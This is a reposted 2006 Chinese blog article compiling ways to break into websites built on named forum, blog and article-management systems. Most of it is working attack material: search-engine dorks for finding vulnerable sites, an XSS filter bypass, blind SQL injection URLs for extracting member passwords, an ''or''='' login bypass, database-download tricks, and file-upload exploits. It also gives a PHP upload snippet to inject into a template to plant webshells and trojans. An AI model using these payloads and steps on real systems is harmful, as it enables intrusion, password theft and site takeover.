入侵网站的各种漏洞的利用

转载 2006年06月14日 16:12:00
信息来源:慕容小雨’s blog 

转过来感慨下。主要是给我等不熟悉国内情况的朋友们看看。偶个人认为国内的比国外的难多了~~汗 

各种漏洞的利用和一些搜索参数  
说到漏洞,首先应该提到的就是动网的上传漏洞了。  

"洞网"漏洞拉开了上传漏洞文件的序幕,其他系统的上  
传漏洞接踵而来!  

asp动网论坛漏洞分析  

1、这个漏洞不算太严重,用过动网论坛的人都知道,发帖时直接写javascript会被过滤拆分,写http会自动加上链接,漏洞就在此,在这两个地方变通一下,把两个单词的某个字母换成编码形式,然后系统再对应地解码回字母,就达到了避免被过滤的目的。例子说明一下,在发帖时写入[img]javas&#x63ript:window.open(‘htt&#x70://www.fwcn.com’,’’)[/img] 很清楚地看到,#x63解码的字母是"c",#x70解码的字母是"p",&起到连接作用,最后加上[img],使JS被触发,如果论坛支持flash插入,用[swf]也可。利用这个漏洞可以搞些恶作剧,写上诱人的主题,点进去结果是他的主页(骗点击率,作广告),甚至更绝,连到一个有病毒、木马的网页上,让你直想骂娘。这个漏洞存在于动网的各个版本,包括较新的0519版,覆盖面积之广让人瞠目,各人认为应该对某些非法字符进行检测剔除,而非简简单单地拆分了事,真希望动网开发者能尽早补上这漏洞。  

2、比起前者,第二个漏洞问题就大啦,利用该漏洞可以破解掉论坛上所有注册会员的密码(恐怖~~~),由于论坛管理员通常直接把论坛程序载下来梢加以美工就拿来使用了,图方便直接导致了漏洞的出现,我们也载一个回来,只要看一下动网的数据库,就知道了密码的字段为userpassword,接着例如要破一个名叫abc的用户密码,首先察看abc的用户资料,给出的连接是http://xxxxx/dispuser.asp?name=abc ,在dispuser.asp中,读取参数的语句是:username=trim(request("name")),数据库的查询的语句是: sql="select * from [user] where username=’"&username&"’",看得出来, abc就是直接被作为了dispuer的一个参数username,另外,如果该用户不存在,程序就会给出提示,既然如此,我们就再写入个查询密码的条件,在where username=abc后面加上and userpassword="******",理论上这样就可以实现对密码的破解了,但这么破要破到何年何月,现在就要轮到VBS函数大显身手了,可以先用len函数试出用户的密码位数,地址就这么写http://xxxxx/dispuser.asp?name=abc'%20and%20len(userpassword)=5%20and%20’1’=’1,这么看可能不好理解,放到sql语句里其实就是这副样子:sql="select * from [User] where username=’abc’ and len(UserPassword)=5 and ’1’=’1’",现在明白点了吧,%20是空格,abc后面的单引号和’1’=’1里的单引号都是为了和sql语句相匹配。奇怪,该用户不存在,喔?那就说明符合这个条件的用户没有,继续,把5换成6,7,8,依此类推,只要能显示出用户资料了,就说明密码位数猜对了。接下来要做的就是试每位的密码是多少了,继续要用到VBS,可以用left或right或mid函数,http://xxxxx/dispuser.asp?name=abc'%20and%20left(userpassword,1)=’a,如果猜对了就给出用户资料,猜对了就给出该用户不存在的提示,这样子还是嫌太慢,那就在外面再套个asc函数,http://xxxxx/dispuser.asp?name=abc'%20and%20asc(mid(userpassword,1,1))>’50 试出用户密码的ASCII码是否大于50,不断地缩小范围,相信很快就能将范围缩小至个位数,看到这里你是否惊出了一身冷汗,起码我是如此,*几个函数的灵活运用,保守地说,不出半小时就能破解出密码。真是不幸中的大幸,动网开发者在后来的05**版后使用了MD5的加密,这下子总算放心了,但介于国内还有许多地方在使用老版本的动网论坛(包括一个小有名气的flash站点)  

3 、动网SQL语句漏洞  
此漏洞针对动网SQL版本。  
测试方法:在http://ip/bbs/admin_index.asp 输入用户名是’or’’=’ 密码也是这个  
这样可以跳过认证  
原理:利用SQL语法。输入的密码和ID就成为一个合法的SQL语句,直接跳过认证。  
此漏洞并不针对动网。很多SQL的ASP都会有这个漏洞  

4、动网论坛sp2漏洞 (此漏洞影响范围甚大,动网官方站、黑客防线、安全基地都曾因此被黑过,具体资料大家可以在百度搜一下)  
上传漏洞路径:reg_upload.asp及upfile.asp  

青创文章系统  

打开google 输入.tw qcdn (或者是去百度搜索 Powered by:QCDN_NEWS 但大多数是中国的)  
青创文章系统  
上传漏洞。在网址后加/admin_upfile.asp 如果出现。  
Microsoft VBScript 磅︽顶琿岿粇 岿粇 ’800a01b6’  
ンぃや穿妮┦┪よ猭: ’form’  
/article/admin_upfile.asp, 21  
就代表已经有90%以上的希望了  
桂林老兵的上传工具上传木马  
入侵的時候發現admin_upfile.asp改了。你也可以改成user_upfile.asp也上傳傳馬馬。還有一個方法就是把admin_upfile.asp user_upfile.asp加到注入工裏邊  

青创文章管理系统注入功击  
关键字"list.asp?unid="  
工具:  
  1、NBSI好像大部分黑客站点都有得下。  
  2、MD5Crack2,破解MD5加密的软件(磊子推荐:dos下DV.exe比较好用)  
第一次检测的时候,会报告"暂未检测到注入漏洞";然后在"特征字符"输入"Unid"  
(提示:"Unid"中的" U "一定要是大写的  

"飞龙文章管理系统" 漏洞  

飞龙文章管理系统 Ver 2.0 Build 20040620 正式版漏洞利用  
搜索"Article.asp?ArtID="关键字  
漏洞文件在  
admin_upfile.asp  
user_upfile.asp  
这两个文件"upfile.asp"  
动网漏洞的再现  
上传时cookie中加"ArtID=1111;"  

phpwind 1.3.6 的论坛漏洞的利用  
搜索关键字"POWER BY PHPWIND v1.3.6"  

phpwind1.3.6论坛利用程序 "群共享"中有上传  

保存后,木马地址为当前目录下的faq.php  

在本机用如下表单进行提交:  
<form ENCTYPE="multipart/form-data" ACTION="http://1717t.78cm.com/faq.php"  
METHOD="POST">  
<input NAME="MyFile" TYPE="file">  
<input VALUE=" 提交 " TYPE="submit">  
</form>  
上传成功后的木马存在论坛目录下  
直接访问就行!  

漏洞集合  

1)Co Net MiB Ver1.0~4.0 用’or’=’or’登陆管理员(一个比较经典的漏洞)  

2)ASP Calendar漏洞 请在google搜索Maintained with the Ocean12 ASP Calendar Manager v1.01这个信息,程序的默认数据库为o12cal.mdb(非MD5加密,明文保存)  

3)六合彩漏洞 我们打开www.baidu.com或是www.google.com  
在搜索里输入 请各位验证会员料  
http://www.3589.com/tian/4login.asp把4login.asp改成conn.inc  

<%DBPath=Server.MapPath("wz520#.mdb")  
Set conn=Server.CreateObject("ADODB.Connection")  
conn.Open "Driver={Microsoft Access Driver (*.mdb)};DBQ="&DBPath%>  

wz520#.mdb,他就是数据库了。#改成%23就可以下载数据库了  

4)青创文章系统出现严重漏洞 在网址后加/admin_upfile.asp上传WEBSHELL  

百度搜索 Powered by:QCDN_NEWS 台湾.tw qcdn。  

还可以用%5c暴库,通杀  

"list.asp?unid=" " .tw/list.asp?unid= " 存在注入 在"特征字符"输入"Unid"  
("Unid"中的" U "一定要是大写的)  

5)自由动力3.6的软件上传过滤不严 用WinHex.exe和WSockExpert.exe修改上传木马  

E时代驿站漏洞  
百度搜索"E时代驿站"  
漏洞利用页面 /upload.asp 用老兵直接上传  

沸腾新闻系统上传漏洞  
搜索:沸腾展望新闻系统[核心:尘缘雅境]授权使用  
漏洞:没有对空格进行严格的限制。  
所以,我们直接选定要上传的asp木马,然后在后面加上空格  
它的上传文件是UploadFaceOK.asp  

尘缘雅境  

在GOOGLE里搜索关键词: V1.0 ACCESS Finish,就会看  
到出现了  
一大堆  
使用尘缘雅境系统的网站.比如说他的网站首页  
是http://www.xx.com/asfq/index.asp,那么就要这样填写  
http://www.xx.com/asfq/admin/uploadfaceok.asp,[漏洞目  
录]:/asfq/admin  
(注意一定要加上admin),[漏洞文件]一般不用改,不过有  
些老版的  
尘缘系统  
的漏洞文件是uploadok.asp,如果uploadfaceok.asp不成功  
再改  

OFSTAR论坛漏洞利用程序(群共享中)  
搜索: powered by ofstar.net  
1:输入管理员用户名 2:输入任意一个帖子的路径!  

3:单击获取密码,可以截取到管理员的MD5密码!是32位加密的!  

4:单击直接登陆按钮!程序会自动构造Cookies进行登陆!单击管理栏的"超管"可直接进入后台!  

上传木马: 选择后台的论坛管理=>风格摸版设置 插入以下代码! (其实上传shell部分和PHPWind一样)  

然后使用提交页面提交``可以直接拿到shell!  

<style type=’text/css’>  
</style>  
<!--  
EOT;  
?>-->  
<?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?>  
<!--  
<?php  
print <<<EOT  
-->  

破废墟BLOG漏洞  
百度搜:"破废墟 Bloging"  
在后面加上;upfile.asp  
结果返回:"DLOG错误:提交的数据来自网站外部 | 返 回  
或者 您要访问的网页有问题,无法显示。  
HTTP 500 - 内部服务器错误  
这说明这个文件是存在的,但是无法正常的访问,其实我们也可以利用  
直接用老兵上传木马http://www.xxxxx.com/blog/upfile.asp  

极限论坛系统漏洞  
用"EzRick.com All Rights"做关键字搜索  
论坛的置顶帖子存在注入漏洞,大家打开置顶帖子后联接都是这种形式"showtopic.asp?TOPIC_ID=111&Forum_ID=11"当我们去掉后面的"&Forum_ID=11",注入点就出现了。  
然后我们在注入猜解工具的表段名里面添加上"Forum_UserDB"就可以跑出论坛的用户名和16位md5密码散列  

暴库入侵 OBLOG!  
搜索 :powered by OBlog  
暴库示例 :  
http://***/blog/index.asp?classid=3  
将以上连接中的最后一个正斜杠"/"改为"%5c"  
http://***/blog%5cindex.asp?classid=3  

截止powered by OBlog ver2.22之前90%的OBLOG站点都能暴库  

阿天在线整站上传漏洞  
百度搜索:阿天在线  
漏洞利用很简单  
直接用老兵上传工具就可以搞顶  
漏洞文件是mg_upfile.asp  

"动感系统"的上传漏洞  

漏洞的文件就是根目录下的upfile.asp  
在百度里搜  
inurl: (SoftView.Asp?SoftID=)  
这样找的是Access版的  
inurl: (/SoftView/SoftView_)  
这样找到的都是SQL版的  

net pic PHP程序的漏洞利用  

当PHP程序有指定PATH时,在PATH文件后门加入%00可以  
上传任意文件.  
在百度里搜索"NEATPIC PHP目录直读版 1.2.3"你会找到很  
多装有些程序的站点  

在www.google.com中输入"版本:Joekoe V6.0"  
或者在www.baidu.com中查询"关于我们 ┋ 网站留言 ┋ 友情链接 ┋ 与我在线"  
会找到很多joekoe论坛的地址  

使用方法:  

例如网址为http://www.xxx.com/yyy/forum.asp  
在主机名中输入www.xxx.com  
在发送主机路径中输入/yyy/upload.asp  
点击发送即可  

使用木马asp  
在回应信息中出现上传成功的提示后,在ie地址栏中输入  
http://www.xxx.com/yyy/upload/forum/newmm.asp即可  

在www.baidu.com中输入"卓越网站快车"  
会找到很多相关的地址  

使用方法:  

例如网址为http://http://www.xxx.cn/htdocs/index.asp  
在主机名中输入www.xxx.com  
在发送主机路径中输入/htdocs/system/user/upimg1/fileupimg3.asp.如果没有/htdocs的虚拟目录,则不用改变默认值.  
点击发送即可  

使用木马asp  
在回应信息中出现上传成功的提示后,在"上传的asp文件名中"的编辑框中  
会出现上传成功的asp名称.例如  
HTTP://www.xxx.cn/htdocs/FICE/UP/20041122234053.cdx.asp

相关文章推荐

【转】详解:利用PHPCMS V9漏洞入侵网站取得webshell权限

考虑到本文涉及到的v9漏洞已公布很长时间,并且官方早已给出补丁,对绝大部分站点影响已经很小,湛蓝特将此方法发布与大家分享学习,此方法可取得目标站点webshell权限,上传任意木马控制站点。 ...

利用phpcms后台漏洞渗透某色情网站

本文来源于i春秋学院,未经允许严禁转载 phpcms v9版本最近爆了好几个漏洞,网上公开了不少信息,但没有真正实战过,就不能掌握其利用方法,本次是在偶然的机会下,发现一个网站推荐楼凤信息,通过...
  • wodafa
  • wodafa
  • 2017-04-24 13:47
  • 1325

利用XSS注入漏洞能对网站做什么

或许大家经常看一些高手测试XSS漏洞都是alert一个窗口来。便以为XSS即是如此,当自己alert出窗口来,便说自己发现了漏洞。 其实远没这么简单。你发现的只是程序员的一个小bug而已,远谈不...

2006新漏洞利用入侵

  • 2014-02-15 11:38
  • 2.63MB
  • 下载

PHP漏洞全解(六)-跨网站请求伪造

CSRF(Cross Site Request Forgeries),意为跨网站请求伪造,也有写为XSRF。攻击者伪造目标用户的HTTP请求,然后此请求发送到有CSRF漏洞的网站,网站执行此请求后,引...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:深度学习:神经网络中的前向传播和反向传播算法推导
举报原因:
原因补充:

(最多只允许输入30个字)